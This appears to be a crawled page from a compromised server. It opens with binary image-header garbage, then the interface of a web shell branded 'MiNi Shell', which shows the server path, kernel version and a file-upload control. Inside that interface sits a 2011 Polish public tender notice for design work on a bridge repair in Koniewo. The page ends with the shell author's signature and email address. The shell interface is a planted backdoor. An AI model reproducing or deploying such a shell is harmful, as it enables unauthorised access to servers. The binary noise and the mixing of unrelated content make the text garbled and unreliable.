JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111024/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111024/277621-N-2011.html

<p class="kh_header"><b>Lidzbark Warmiński: Opracowanie dokumentacji projektowej na remont obiektu mostowego wraz umocnieniem skarp w miejscowości Koniewo, Gmina Lidzbark Warmiński</b><br>
<b>Numer ogłoszenia: 277621 - 2011; data zamieszczenia: 24.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Lidzbarku Warmińskim , ul. Wyszyńskiego 20, 11-100 Lidzbark Warmiński, woj. warmińsko-mazurskie, tel. 089 767 00 10, faks 089 767 00 10.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na remont obiektu mostowego wraz umocnieniem skarp w miejscowości Koniewo, Gmina Lidzbark Warmiński.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej na  remont mostu wraz umocnieniem skarp na rzece Elmie w ciągu drogi powiatowej nr 1543N  w km 4+012 w miejscowości Koniewo, Gmina Lidzbark Warmiński. Obiekt mostowy o numerze ewidencyjnym JNI: 01020857, długości 12mb, konstrukcji żelbetowej.
Obecny Stan techniczny obiektu jest w przedziale między niedostatecznym 2 a niepokojącym 3 oznacza to, że obiekt wykazuje uszkodzenia, których nienaprawienie spowoduje skrócenie eksploatacji a także obniżające przydatność użytkową ale możliwe do naprawy.
1. Założenia
1.1  przeprowadzenie badań wytrzymałościowych 
1.2  przeprowadzenie obliczeń statyczno-wytrzymałościowych ustroju nośnego wykazujących sposób wzmocnienia 
2. Zakres naprawy
2.1  Ustrój nośny
a)	rozbiórka nawierzchni
b)	rozbiórka izolacji
c)	rozbiórka nadbetonu belek
d)	wykonanie nadbeton belek
e)	naprawa spodów belek
f)	ewentualne wzmocnienie od spodu belek 
g)	naprawa gzymsów 
h)	wykonanie nowej izolacji 
i)	wykonanie nawierzchni warstwa wiążąca + ścieralna
2.2  Podpory
a)	zabezpieczenie podpór i skrzydeł 
b)	przebudowa strefy połączenia konstrukcji 
2.3   Zabezpieczenie skarp
Skarpa w zakolu prawobrzeżny rzeki powinna być zabezpieczona poprzez wykonanie ścianki szczelnej stalowej kotwionej.
Pozostałe skarpy uzupełnione zasypkami i umocnione tradycyjnie zgodnie z zaleceniami administratora rzeki.

3. Zakres rzeczowy dokumentacji : 

3.1	Projekt zagospodarowania terenu objętego opracowaniem - 6 egz.
3.2	Projekt budowlany - 6 egzemplarzy,
3.3	Projekt wykonawczy - 4 egzemplarze,
3.4	Projekt przełożenia lub zabezpieczenia istniejącej infrastruktury uzbrojenie terenu itp., jeżeli będzie wymagany - 3 egz.                                                                                                                                                          
3.5	Projekt organizacji ruchu na czas wykonywania robót budowlanych- 3 egz.
3.6	Operat wodno-prawny - 3 egz.
3.7	Inwentaryzację drzew przewidzianych do wycinki - 3 egz.
3.8	Dokumentację geotechniczną - o ile będzie wymagana- 3 egz.
3.9	Dokumentację hydrologiczną - o ile będzie wymagana - 3 egz.
3.10	Informację Bezpieczeństwa i Ochrony Zdrowia - 6 egz.
3.11	Specyfikację techniczną wykonania i odbioru robót - 3 egz.
3.12	Przedmiar robót - 3 egz.
3.13	Kosztorys inwestorski -  3 egz.
3.14	Projekt zapisany do PDF na płycie CD.
Wykonawca zobowiązany jest dostarczyć wszelkie inne opracowania niezbędne dla kompletności dokumentacji wynikających z decyzji i warunków wydanych dla potrzeb dokumentacji
Wykonawca dołączy do projektu budowlanego oświadczenie, że jest on wykonany zgodnie z umową, obowiązującymi przepisami techniczno-budowlanymi, normami i wytycznymi oraz że został wykonany w stanie kompletnym z punktu widzenia celu, któremu ma służyć.
Ponadto wykonawca przedłoży zaświadczenie o posiadanych  uprawnieniach wydane przez właściwą izbę samorządu zawodowego.
Opracowania projektowe będą zawierać wszystkie wymagane potwierdzenia sprawdzeń rozwiązań projektowych, opinie, uzgodnienia , zgody i pozwolenia w zakresie wynikającym z przepisów a także spis opracowań składających się na komplet przedmiotu umowy. Każdy z egzemplarzy opracowania projektowego będzie zawierał oświadczenie projektanta o spełnieniu powyższych wymagań. Opracowania projektowe powinny być zgodne z obowiązującymi normami oraz przepisami prawa obowiązującymi w dniu przekazania ich Zamawiającemu.
Dokumentacja nie może być opisana przez wskazanie znaków towarów, patentów lub pochodzenia, chyba że jest to uzasadnione specyfikacją rozwiązania i nie można go opisać za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważny i podane jest określenie, co stanowić będzie o równoważności zaproponowanego rozwiązania.
Do wykonawcy należeć będzie uzyskanie stosownych map sytuacyjno - wysokościowych, uzyskanie warunków technicznych oraz przygotowanie wniosku do uzyskania decyzji  o ustaleniu lokalizacji celu publicznego oraz uzyskanie stosownych uzgodnień.
Wykonawca zobowiązuje się do bezpłatnej aktualizacji kosztorysu inwestorskiego w ciągu 2 lat od daty przekazania Zamawiającemu przedmiotu umowy;
Wykonawca w ramach niniejszej umowy zobowiązuje się do pełnienia nadzoru autorskiego nad wykonywanymi na podstawie opracowanego projektu robotami w tym przybycia na budowę na każde żądanie Zamawiającego.
4. Ponadto wykonawca na etapie opracowania dokumentacji projektowej zobowiązany jest do:
4.1 opracowania mapy do celów projektowych,
4.2  przygotowania wniosku o wydanie decyzji środowiskowej - jeżeli będzie wymagana,
4.3  przygotowania wniosku o wydanie decyzji o ustaleniu lokalizacji inwestycji publicznego,
4.4  uzyskania pozwolenia wodnoprawnego,
4.5  zgłoszenia robót budowlanych,
4.6  uzyskania wszelkich koniecznych opinii, zatwierdzeń, uzgodnień, decyzji administracyjnych dla wykonanego projektu

5. Przepisy: 
Dokumentacja projektowo - kosztorysowa musi być opracowana zgodnie z: 
5.1. Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie 
szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego 
(Dz. U. 2004. Nr 202, poz.2072 z późn. zm.) 
5.2.Ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. 2004 r. Nr 92 
       poz. 881) oraz aktami wykonawczymi do tej ustawy, 
5.3.Ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. 2010 r. Nr 113   
       poz. 759 ), a w szczególności z art. art.29 ust.3, w myśl którego przedmiotu zamówienia nie wolno opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i nie można opisać przedmiotu  zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważny oraz aktami wykonawczymi do tej ustawy: 
5.4.Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia 
       metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych  
       kosztów prac projektowych oraz planowanych określonych w programie funkcjonalno-
       użytkowym (Dz. U. 2004 r. Nr 130 poz. 1389), 
5.5.Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 30.05.2000 r. w 
 sprawie warunków technicznych, jakim powinny odpowiadać obiekty inżynierskie i ich       usytuowanie (Dz. U. 2000 r. Nr 63 poz. 735z późn. zm.) 
5.6.Ustawą Prawo wodne (tj. Dz. U. 2005 r. Nr 239 poz. 2019) 
5.7. Ustawą z 21.03.1985 r. o drogach publicznych ( Dz.U.2007 r. Nr 19 poz. 115 z późn. zm.) oraz innymi obowiązującymi przepisami prawa (w tym: ochrony ppoż., bhp, ochrony środowiska) przepisami techniczno-budowlanymi, normami, katalogami, wytycznymi, instrukcjami. 
6. Uwagi końcowe:
6.1  Przyjęte w trakcie projektowania rozwiązania i materiały należy konsultować z 
	  zamawiającym oraz uzyskać jego akceptację. 
6.2  Wykonawca zobowiązany jest do opisywania proponowanych materiałów i urządzeń 
	  za pomocą parametrów technicznych, tzn. bez podawania ich nazw, znaków 
       wskazujących na producenta. 
6.3  Zamawiający nie przewiduje: udzielenia zamówień uzupełniających, aukcji   
       elektronicznej, zawarcia umowy ramowej, dynamicznego systemu zakupów zaliczek 
       na poczet wykonania umowy. 
6.4  Wymagania w zakresie realizacji zamówienia zawiera również wzór umowy, stanowiący  
      załącznik do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.23.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu wykonał jedną usługę, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem jej wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że usługa została wykonana należycie tj. co najmniej jedną usługę w zakresie opracowania dokumentacji projektowej na budowę, przebudowę lub remont obiektu mostowego o wartości min. 40 000 zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia posiadającymi niżej wymienione kwalifikacje zawodowe:
a) wymagany jest udział co najmniej dwóch osób (projektant, sprawdzający) posiadających uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane tj. do projektowania bez ograniczeń w specjalności mostowej oraz przedłoży oświadczenie, że wskazane osoby posiadają wymagane uprawnienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany istotnych postanowień umowy mogą dotyczyć:
a)	terminu realizacji zamówienia,
b)	warunków i terminów płatności,
c)	zmiany wynagrodzenia w przypadku zmiany ustawowej stawki podatku VAT,
d)	zmiany parametrów technicznych, jeśli przyczyni się to do poprawy jakości zamówienia, przy czym zmiana ta nie spowoduje zwiększenia kosztów realizacji zamówienia.
2.	Zmiany, o których mowa w ust. 1, mogą nastąpić jedynie w uzasadnionych przypadkach, 
w szczególności:
a)	w zakresie ppkt. a), b),  w przypadku: wystąpienia siły wyższej, tj. katastrofa naturalna, strajk, pożar, eksplozja, wojna, atak terrorystyczny,
b)	w zakresie pkt. b) c) w przypadku: zmian powszechnie obowiązujących przepisów prawa w trakcie realizacji umowy, w szczególności dotyczących przepisów podatkowych, np. zamiany ustawowej stawki podatku VAT lub regulacji dot. Wykorzystania środków budżetowych,
c)	w zakresie pkt a)  w przypadku przedłużenia terminu zakończenia postępowania o udzielenie zamówienia.
3.	Wykonawca wnioskujący o zmianę umowy, przedkłada zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/powiat_lidzbarski/285/Przetargi/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych, ul. Wyszyńskiego 20, 11-100 Lidzbark Warmiński.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.11.2011 godzina 10:00, miejsce: Zarządu Dróg Powiatowych, ul. Wyszyńskiego, 
11-100 Lidzbark Warmiński,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com